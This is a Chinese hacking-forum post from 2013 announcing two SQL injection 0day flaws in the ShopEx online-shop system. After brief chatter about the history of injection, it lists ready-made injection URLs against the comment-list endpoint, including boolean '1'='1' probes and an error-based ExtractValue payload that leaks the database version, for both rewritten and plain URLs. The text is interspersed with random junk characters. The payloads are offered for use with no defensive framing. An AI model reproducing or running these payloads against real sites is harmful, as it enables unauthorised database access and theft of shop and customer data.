找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2045|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 08:31:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… & Y% c) G* X) H* h

) x" }$ c+ g0 s6 d好吧,我扯远了~~/ f, \5 ~9 e2 K* m
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~% M, l- z3 g8 c' t6 @1 [7 G
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 9 I$ `) q3 j; B/ T" l5 H  Z  h; S$ F
; ]8 w- r% I1 V" W6 D8 F
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
! V; W' d5 E* S4 C+ o
6 G' R7 d# `, [. h" D& rhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ( l4 J0 Y+ \) x1 t; e! x

$ g. B+ B) b! q: X2 `# S2 Bhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html " B2 n6 |' Z* K0 w8 e/ l% a
, s+ d8 ^; r+ t7 ^% d- u9 g
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
9 O! J" h& [2 T7 \7 s
3 P$ I- p% W; P# d. e; u1 b 7 Y6 j3 X8 _% [( }5 P
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
3 z7 x% ~" _; r9 ]8 F$ a如何注入就不多说了,10多年的东西了…不会也会了…
1 C7 Y  A' _) g) J0 r, Z8 |4 |$ R8 ?# b

+ N/ c9 a" i! e
" A# [, M# w+ u( E5 w* Q, y- V8 x& S1 g* z3 W/ i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表